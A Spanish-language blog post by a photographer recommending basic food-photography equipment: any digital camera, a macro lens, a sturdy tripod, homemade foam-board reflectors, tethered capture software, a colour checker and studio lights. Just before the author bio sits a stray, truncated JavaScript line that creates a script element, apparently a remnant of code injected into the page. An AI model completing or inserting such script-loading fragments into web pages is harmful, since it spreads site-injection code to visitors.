Equipo Básico para Fotografía de Alimentos

Todo dependerá de que tanto trabajo hagas y que tanto te gusta trabajar con equipo

Muchos de los fotógrafos que conozco, son fanáticos del equipo, les encanta hablar de equipo, tener lo último en equipo, hablar de él. Yo no soy mucho de ello, soy más de mantener las cosas simples en mi trabajo, así que les presento una lista de equipo para iniciar de manera sencilla.

1. Cualquier cámara digital

La cantidad de megapixeles, si de sensor grande o recortado, no es prioritario. Lo importante, es que te sientas a gusto con tu cámara. Pentax, Sony, Fuji, Olymous, fabrican muy buenas cámaras, sin embargo, Canon y Nikon, son las que tienen más usuarios asi como una amplia gama de accesorios, lo cual te puede ser importante algún día. Por otra parte si algún día quieres comprar una mejor cámara estas dos márcas tienen un mejor valor de reventa.

2. Lente Macro

Los lentes macro de marca como Canon y Nikon, son definitivamente la mejor opción, aunque son más caros, existen otras alternativas como lentes de marcas con Sigma y Tamron, tambien tenemos los filrtos macro que se atornillan al frente de un lente común, estos presentan por lo general deficiencia cuando hablamos de nitidez y profundidad de campo. Mi lente favorito para realizar macros de comida es el Canon 100mm f/2.8 Macro.

3. Un Buen Tripie

En el entendido de que la fotografía de alimentos es un proceso en el cual vamos construyendo una imagen y que tenemos que realizar varios disparos de prueba, un tripie robusto es indispensable. Uno de las especificaiones que debes de tener en cuenta es la altura mínima de tu tripie, la altura común de una mesa de restaurante es de aproximadamente 75 cm. Mi tripié favorito en un Gitzo Serie 2, con Cabeza Acratech Ultimate, este me pemite la movilidad necesaria con un tripie ligero y estable.

4. Reflectores Caseros

Una visita a tu papelería más cercana, será sufuciente para complementar tu equipo de iluminación, Un par de pliegos de foam board, de preferencia blanco de un lado y negro del otro, un cutter, funtak de Pritt y un par de porta libros. Y de tu alacena un poco de papel aluminio, es lo que necesitas para crear tus reflectores y como mantenerlos en su lugar.

5. Computadora con capacidad Tethered

En mi caso utilizo el EOS capture que viene como parte del sofware de Canon. Lightroom es compatible con algunas cámaras Canon, Nikon y Leica. Capturar tether significa que la imagen pasa directamente de la cámara a la computadora, permitiéndonos esto un mejor control sobre la imagen que estamos creando, en el caso de la fotografía de alimentos, tether es una herramienta muy valiosa ya que en este tipo de fotografía, se requiere de disparar, observar y repetir, y esto es mucho más facil, si tienes la posibilidad de evaluar tus imágenes en una pantalla de computadora en lugar de hacerlo a través de la pantalla de tu cámara.

6. Verificador de Color

Una herramienta como Color Checker Passport ó Expodisk es crucial. Un verificador de color es importantísimo sobre todo si creas tu toma con luz natural o con la luz disponible en el lugar de la sesión ya que en muy pocas ocasiones será igual a los balances de blancos de tu cámara.

7. Luces de Estudio

Estas pueden ser muy caras o relativamente baratas, todo dependerá de que tanto trabajo hagas y que tanto te gusta trabajar con equipo. Algo que debes de tener en mente es que existen infinidad de modificadores de luz para cada sistema y un estudio típico contiene 2 o tres lámparas y sus modificadores. Todo dependerá de si quieres hacer una carrara como fotógrafo de alimentos , pero para un inicio, lo que hay en ester artículo será sufuciente.

var d=document;var s=d.createElement(‘script’);

José Rocha

Fotógrafo de Arte y Naturaleza, Retratista Subacuático e Impresor Giclée. Originario de la Ciudad de México, ha alternado su residencia entre Cancún y Palm Beach, Florida durante los últimos 26 años.